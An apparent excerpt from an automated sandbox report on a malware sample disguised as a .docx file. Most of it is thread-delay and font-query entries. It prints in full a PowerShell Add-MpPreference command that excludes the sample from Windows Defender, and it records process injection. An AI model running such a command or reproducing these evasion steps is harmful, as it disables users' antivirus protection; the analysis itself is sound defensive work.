Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7348	Thread sleep count: 2187 > 30	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -599843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7348	Thread sleep count: 7664 > 30	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -599718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -599606s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -599492s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -599375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -599265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -599156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -599046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -598937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -598828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -598718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -598609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -598499s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -598390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -598281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -598167s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -598046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -597937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -597815s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -597249s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -597030s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -596921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -596804s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -596694s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -596532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -596406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -596296s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -596187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -596077s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -595968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -595859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -595749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -595640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -595531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -595421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -595312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -595203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -595093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -594984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -594874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -594765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -594654s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -594546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -594437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -594327s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 239890	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 239778	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 239672	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 239560	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 239449	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 239343	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 239234	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 239125	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 238989	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 238875	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 238747	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 238641	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 238510	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 238323	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 237988	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 237797	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 237650	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 237546	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 237398	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 599843	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 599718	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 599606	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 599492	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 599375	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 599265	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 599156	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 599046	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 598718	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 598499	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 598390	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 598167	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 598046	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 597815	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 597249	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 597030	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 596804	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 596694	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 596532	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 596296	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 596077	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 595968	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 595749	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 595640	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 595421	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 595093	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 594874	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 594654	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 594546	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 594437	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 594327	Jump to behavior

Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162548189.0000000001516000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Code function: 3_2_06F8B9D0 LdrInitializeThunk,

3_2_06F8B9D0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Memory written: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"			Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process created: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"			Jump to behavior

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
